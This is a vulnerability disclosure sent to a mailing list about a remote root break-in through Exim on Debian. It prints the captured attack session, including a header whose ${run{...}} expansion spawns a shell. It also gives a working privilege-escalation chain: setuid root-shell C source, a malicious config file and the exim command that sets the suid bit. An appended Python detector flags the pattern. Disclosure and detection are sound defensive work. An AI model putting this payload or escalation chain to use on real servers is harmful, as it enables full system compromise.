Hi,
While investigating a security break-in in the network of my company, I
captured (by tcpdump) the sequence of a successful remote root attack through
Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
didn't find the email of the current maintainer of Exim, so I decided to
write to this mailing list. I don't want to publish all details of the
attack before the developers can investigate and fix the vulnerability.
So I ask the Exim maintainers to contact me and I will send them the complete
captured sequence of the attack.
Here I can put a brief sequence of the attack:
EHLO mail.domain.com
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>
DATA
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
....
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
..........
about 700000 the same strings
..........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILb
.
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>
after that the attacker gets a shell with the id of user Debian-exim and cwd
in /var/spool/exim4
then he puts there a setuid file with a trivial execution of a root shell:
#include <unistd.h>      /* setuid, setgid, execl */
#include <sys/types.h>
#include <grp.h>         /* setgroups */

int main(int argc, char *argv[])
{
    /* once the file is root-owned and mode 4755, these succeed */
    setuid(0);
    setgid(0);
    setgroups(0, NULL);
    execl("/bin/sh", "sh", NULL);
    return 1;            /* reached only if execl fails */
}
and creates another file e.conf with the following content (one line; it
was wrapped by the mail client):
spool_directory = ${run{/bin/chown root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}
then he runs:
exim -Ce.conf -q
and gets the suid bit on /var/spool/exim4/setuid
everything else is trivial.
I haven't reproduced the remote part of the attack, but the escalation from Debian-exim to
root also works on exim4-daemon-light 4.72-2 from Debian Squeeze.
With best regards,
Sergey Kononenko.
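The captured session above has a recognisable shape: a flood of long custom headers, a header value carrying an Exim ${run{...}} expansion item, and a body of hundreds of thousands of identical filler lines. The following Python is an added example, not code from the report or from the Exim project: it scans a client-side SMTP transcript (as tcpdump or a mail-proxy log would yield) for those traits. The thresholds, the sample transcript and the header/body parsing are constructed for illustration and are not Exim limits.

```python
"""Flag SMTP DATA blocks that look like the header-flood plus ${run{...}}
pattern described in the report. Thresholds are constructed, not Exim's."""
import re
from collections import Counter

RUN_ITEM_RE = re.compile(r"\$\{\s*run\s*\{")      # Exim ${run{command}} expansion item
HEADER_RE = re.compile(r"^([!-9;-~]+):(.*)$")      # RFC 5322 field-name ':' field-body
MAX_HEADERS = 40          # constructed threshold
MAX_HEADER_LEN = 998      # RFC 5322 maximum line length
MAX_BODY_LINES = 1000     # constructed threshold
MIN_REPEAT_RATIO = 0.9    # share of non-blank body lines that are one repeated string


def split_data_block(transcript):
    """Return (headers, body_lines) for the first DATA section of a transcript.

    headers is a list of (name, value) tuples with folded lines joined;
    body_lines excludes the terminating '.' line. A missing blank line between
    headers and body (as in the report's excerpt) is tolerated: the header
    section ends at the first line that is neither a header nor a continuation."""
    lines = transcript.splitlines()
    try:
        start = next(i for i, l in enumerate(lines) if l.strip().upper() == "DATA") + 1
    except StopIteration:
        return [], []
    headers, body = [], []
    in_headers = True
    for line in lines[start:]:
        if line == ".":
            break
        if in_headers:
            m = HEADER_RE.match(line)
            if m:
                headers.append((m.group(1), m.group(2).strip()))
                continue
            if line[:1] in (" ", "\t") and headers:        # folded continuation
                name, value = headers[-1]
                headers[-1] = (name, value + " " + line.strip())
                continue
            in_headers = False
            if line == "":                                  # normal separator
                continue
        body.append(line)
    return headers, body


def scan_transcript(transcript):
    """Return a list of (rule, detail) findings; an empty list means clean."""
    headers, body = split_data_block(transcript)
    findings = []
    if len(headers) > MAX_HEADERS:
        findings.append(("header-flood", f"{len(headers)} header fields"))
    for name, value in headers:
        if RUN_ITEM_RE.search(value):
            findings.append(("exim-run-expansion", f"{name} contains ${{run{{...}}}}"))
        if len(name) + 2 + len(value) > MAX_HEADER_LEN:
            findings.append(("oversized-header", f"{name} is {len(value)} bytes"))
    if len(body) > MAX_BODY_LINES:
        findings.append(("oversized-body", f"{len(body)} body lines"))
    filler = [l for l in body if l.strip()]
    if len(filler) >= 100:
        top = Counter(filler).most_common(1)[0][1]
        if top / len(filler) >= MIN_REPEAT_RATIO:
            findings.append(("repeated-filler", f"{top} identical non-blank lines"))
    return findings


def build_sample_transcript(n_headers=54, body_lines=1500):
    """Constructed transcript shaped like the report's excerpt (much shorter),
    with a harmless placeholder command inside the expansion item."""
    hdrs = [f"MAILbombhdr{i:04d}: " + "M4iLB0mb" * 200 for i in range(1, n_headers + 1)]
    hdrs.append("HeaderX: ${run{/bin/true}}")
    body = ["MAILbomb" * 10] * body_lines
    return "\n".join(["EHLO mail.example.test", "MAIL FROM: <sender@example.test>",
                      "RCPT TO: <postmaster@example.test>", "DATA",
                      *hdrs, "", *body, ".", "QUIT"]) + "\n"


# Constructed ordinary message for comparison.
BENIGN_TRANSCRIPT = "\n".join([
    "EHLO mail.example.test", "MAIL FROM: <a@example.test>",
    "RCPT TO: <b@example.test>", "DATA", "From: a@example.test",
    "Subject: hello", "", "Hi there.", ".", "QUIT"]) + "\n"


if __name__ == "__main__":
    for rule, detail in scan_transcript(build_sample_transcript()):
        print(rule, detail)
```

The ${run{ check is the high-value signal: a client has no legitimate reason to place an Exim expansion item in a header, and it is independent of any size threshold, so it remains useful even if an attacker changes the padding. The size rules are there to catch the flood itself when the payload is obfuscated.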